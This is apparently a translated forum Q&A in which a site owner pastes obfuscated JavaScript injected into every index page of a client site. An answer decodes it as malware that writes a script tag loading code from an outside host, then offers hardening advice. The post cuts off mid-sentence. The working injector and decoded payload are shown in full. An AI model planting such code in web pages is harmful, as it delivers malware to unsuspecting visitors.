Cha*_*ron 3 html javascript php
也许有人可以帮助或解释发生的事情.今天刚刚注意到,在我的一个客户端站点上,所有index.php/index.html都被替换,并添加了一些模糊的javascript代码.代码如下:
<script type="text/javascript">
var nhZE2uSD="Ow8xN18Ow8xN31";
var usW1446O0="Ow8xN3cOw8xN73Ow8xN63Ow8xN72";
var usW1446O1="Ow8xN69Ow8xN70Ow8xN74Ow8xN20";
var usW1446O2="Ow8xN74Ow8xN79Ow8xN70Ow8xN65";
var usW1446O3="Ow8xN3dOw8xN22Ow8xN74Ow8xN65";
var usW1446O4="Ow8xN78Ow8xN74Ow8xN2fOw8xN6a";
var usW1446O5="Ow8xN61Ow8xN76Ow8xN61Ow8xN73";
var usW1446O6="Ow8xN63Ow8xN72Ow8xN69Ow8xN70";
var usW1446O7="Ow8xN74Ow8xN22Ow8xN20Ow8xN73";
var usW1446O8="Ow8xN72Ow8xN63Ow8xN3dOw8xN22";
var usW1446O9="Ow8xN68Ow8xN74Ow8xN74Ow8xN70";
var usW1446O10="Ow8xN3aOw8xN2fOw8xN2fOw8xN61";
var usW1446O11="Ow8xN6eOw8xN6eOw8xN6fOw8xN75";
var usW1446O12="Ow8xN2eOw8xN73Ow8xN65Ow8xN72";
var usW1446O13="Ow8xN76Ow8xN65Ow8xN68Ow8xN74";
var usW1446O14="Ow8xN74Ow8xN70Ow8xN2eOw8xN63";
var usW1446O15="Ow8xN6fOw8xN6dOw8xN2fOw8xN2f";
var usW1446O16="Ow8xN6dOw8xN6cOw8xN2eOw8xN70";
var usW1446O17="Ow8xN68Ow8xN70Ow8xN22Ow8xN3e";
var usW1446O18="Ow8xN20Ow8xN3cOw8xN2fOw8xN73";
var usW1446O19="Ow8xN63Ow8xN72Ow8xN69Ow8xN70";
var usW1446O20="Ow8xN74Ow8xN3e";
var JgUg10US="g4Uuq18Ow8xN31";
var Q8NVsUq5=usW1446O0+usW1446O1+usW1446O2+usW1446O3+usW1446O4+usW1446O5+usW1446O6+usW1446O7+usW 1446O8+usW1446O9+usW1446O10+usW1446O11+usW1446O12+usW1446O13+usW1446O14+usW1446O15+usW1446O16+usW1446O17+usW1446O18+usW1446O19+usW1446O20;
CvhvkAeR=Q8NVsUq5.replace(/Ow8xN/g,"%");
var KcQGBJKD=unescape;
var nhZE2uSD="cZLH618g4Uuq31";
q9124=this;
var WrEGuKeo=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];
WrEGuKeo.write(KcQGBJKD(CvhvkAeR));
</script>
有人能解释一下代码的作用吗?
谢谢你的帮助.
这是恶意软件.它注入:
<script type="text/javascript" src="http://annou.servehttp.com//ml.php"> </script>
不用说,我不建议访问该域名.
大多数脚本都是用于混淆的变量赋值.如果执行除最后一行之外的所有操作(此部分不使用任何未知函数),则可以打印WrEGuKeo(文档)和KcQGBJKD(CvhvkAeR)(上面的字符串). KcQGBJKD只是unescape.
看起来网站已被盗用,基于php标签,我建议您使用HTML Purifier或OWASP来使事情变得更加安全.
您必须从php.ini 禁用eval构造和allow_url_fopen设置.
使用以下方法分析任何安全漏洞的服务器设置: